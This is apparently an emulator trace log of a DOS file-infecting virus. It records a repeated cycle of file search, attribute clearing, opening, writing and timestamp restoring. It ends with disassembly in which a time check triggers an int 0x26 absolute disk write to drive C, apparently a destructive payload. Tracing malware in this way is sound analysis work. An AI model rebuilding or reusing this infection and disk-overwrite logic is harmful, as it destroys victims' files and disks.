2018-12-25T11:45:09.601410523Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T11:45:09.604004208Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T11:45:09.610261283Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T11:45:09.612068443Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:45:09.620643891Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T11:45:09.623306261Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T11:45:09.633239255Z 61 PC: 12acb | Open file (See above)
2018-12-25T11:45:09.640501935Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T11:45:09.641895219Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:45:09.64812206Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T11:45:09.650165585Z 44 PC: 12afa | Get time (See above)
2018-12-25T11:45:09.652511266Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T11:45:09.655980462Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T11:45:09.657488171Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T11:45:09.661204121Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T11:45:09.662632789Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:45:09.669826642Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T11:45:09.673593224Z 67 PC: 12ac6 | Get or set file attributes (See above)
2018-12-25T11:45:09.683518656Z 61 PC: 12acb | Open file (See above)
2018-12-25T11:45:09.690214246Z 87 PC: 12ad3 | Get or set file date and time (See above)
2018-12-25T11:45:09.693199591Z 63 PC: 12ae0 | Read file or device (See above)
2018-12-25T11:45:09.699455187Z 66 PC: 12aef | Move file pointer (See above)
2018-12-25T11:45:09.700718485Z 44 PC: 12afa | Get time (See above)
2018-12-25T11:45:09.703711218Z 64 PC: 12a5e | Write file or device (See above)
2018-12-25T11:45:09.711499907Z 66 PC: 12b0d | Move file pointer (See above)
2018-12-25T11:45:09.713188768Z 64 PC: 12b18 | Write file or device (See above)
2018-12-25T11:45:09.721057443Z 87 PC: 12b1f | Get or set file date and time (See above)
2018-12-25T11:45:09.722634529Z 62 PC: 12b23 | Close file (See above)
2018-12-25T11:45:09.730735441Z 79 PC: 12a94 | Find next file (See above)
2018-12-25T11:45:09.734538834Z 44 PC: 12aa1 | Get time 0x12aa1: cmp dl, 2
0x12aa4: ja 0x12aaf
0x12aa6: mov al, 2
0x12aa8: mov cx, 0x4d2
0x12aab: cdq
0x12aac: int 0x26
0x12aae: popf
0x12aaf: mov dx, 0x80
0x12ab2: mov ah, 0x1a
0x12ab4: int 0x21
0x12ab6: mov di, 0x100
0x12ab9: push di
0x12aba: ret
0x12abb: lea dx, word ptr [bp + 0x259]
0x12abf: mov ax, 0x4301
0x12ac2: xor cx, cx
0x12ac4: int 0x21
0x12ac6: mov ax, 0x3d02
0x12ac9: int 0x21
0x12acb: jb 0x12b23
2018-12-25T11:45:09.737440152Z 26 PC: 12ab6 | Set disk transfer address